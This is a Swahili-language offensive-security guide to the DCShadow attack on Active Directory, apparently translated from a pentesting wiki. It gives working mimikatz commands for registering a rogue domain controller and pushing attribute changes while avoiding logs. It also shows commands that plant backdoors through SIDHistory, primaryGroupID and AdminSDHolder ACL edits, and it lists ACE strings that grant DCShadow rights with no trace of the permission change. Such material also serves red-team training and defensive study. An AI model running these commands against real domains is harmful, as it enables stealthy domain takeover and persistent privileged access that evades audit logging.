DCShadow

Inajisajili Msimamizi Mpya wa Kikoa katika AD na kuitumia kushinikiza sifa (SIDHistory, SPNs...) kwenye vitu vilivyotajwa bila kuacha kumbukumbu kuhusu mabadiliko. Unahitaji ruhusa za DA na uwe ndani ya kikoa cha mzizi.
Kumbuka kwamba ikiwa utatumia data mbaya, kumbukumbu mbaya sana zitaonekana.

Ili kutekeleza shambulio unahitaji mifano 2 ya mimikatz. Moja yao itaanzisha seva za RPC kwa ruhusa za SYSTEM (lazima uonyeshe hapa mabadiliko unayotaka kutekeleza), na mfano mwingine utatumika kushinikiza thamani:

!+
!processtoken
lsadump::dcshadow /object:username /attribute:Description /value="My new description"

lsadump::dcshadow /push

Kumbuka kwamba elevate::token haitafanya kazi katika mimikatz1 session kwani hiyo iliongeza mamlaka ya thread, lakini tunahitaji kuongeza mamlaka ya mchakato.
Unaweza pia kuchagua na "LDAP" object: /object:CN=Administrator,CN=Users,DC=JEFFLAB,DC=local

Unaweza kusukuma mabadiliko kutoka kwa DA au kutoka kwa mtumiaji mwenye ruhusa hizi za chini:

• Katika object ya domain:
• DS-Install-Replica (Ongeza/ondoa Replica katika Domain)
• DS-Replication-Manage-Topology (Simamia Replication Topology)
• DS-Replication-Synchronize (Synchronization ya Replication)
• Object za Sites (na watoto wake) katika Configuration container:
• CreateChild and DeleteChild
• Object ya kompyuta ambayo imeandikishwa kama DC:
• WriteProperty (Sio Andika)
• Object ya lengo:
• WriteProperty (Sio Andika)

Unaweza kutumia Set-DCShadowPermissions kutoa mamlaka haya kwa mtumiaji asiye na mamlaka (kumbuka kwamba hii itacha baadhi ya kumbukumbu). Hii ni ya kikomo zaidi kuliko kuwa na mamlaka ya DA.
Kwa mfano: Set-DCShadowPermissions -FakeDC mcorp-student1 SAMAccountName root1user -Username student1 -Verbose Hii inamaanisha kwamba jina la mtumiaji student1 anapokuwa kwenye mashine mcorp-student1 ana mamlaka ya DCShadow juu ya object root1user.

Kutumia DCShadow kuunda backdoors

lsadump::dcshadow /object:student1 /attribute:SIDHistory /value:S-1-521-280534878-1496970234-700767426-519

lsadump::dcshadow /object:student1 /attribute:primaryGroupID /value:519

#First, get the ACE of an admin already in the Security Descriptor of AdminSDHolder: SY, BA, DA or -519
(New-Object System.DirectoryServices.DirectoryEntry("LDAP://CN=Admin SDHolder,CN=System,DC=moneycorp,DC=local")).psbase.Objec tSecurity.sddl
#Second, add to the ACE permissions to your user and push it using DCShadow
lsadump::dcshadow /object:CN=AdminSDHolder,CN=System,DC=moneycorp,DC=local /attribute:ntSecurityDescriptor /value:<whole modified ACL>

Shadowception - Toa DCShadow ruhusa kwa kutumia DCShadow (hakuna kumbukumbu za ruhusa zilizobadilishwa)

Tunahitaji kuongeza ACEs zifuatazo na SID ya mtumiaji wetu mwishoni:

• Kwenye kituo cha kikoa:
• (OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;UserSID)
• (OA;;CR;9923a32a-3607-11d2-b9be-0000f87a36b2;;UserSID)
• (OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;UserSID)
• Kwenye kituo cha kompyuta ya mshambuliaji: (A;;WP;;;UserSID)
• Kwenye kituo cha mtumiaji wa lengo: (A;;WP;;;UserSID)
• Kwenye kituo cha Tovuti katika kontena ya Mipangilio: (A;CI;CCDC;;;UserSID)

Ili kupata ACE ya sasa ya kitu: (New-Object System.DirectoryServices.DirectoryEntry("LDAP://DC=moneycorp,DC=loca l")).psbase.ObjectSecurity.sddl

Kumbuka kwamba katika kesi hii unahitaji kufanya mabadiliko kadhaa, si moja tu. Hivyo, katika mimikatz1 session (RPC server) tumia parameter /stack na kila mabadiliko unayotaka kufanya. Kwa njia hii, utahitaji tu /push mara moja ili kutekeleza mabadiliko yote yaliyokwama kwenye seva ya rogue.

Taarifa zaidi kuhusu DCShadow katika ired.team.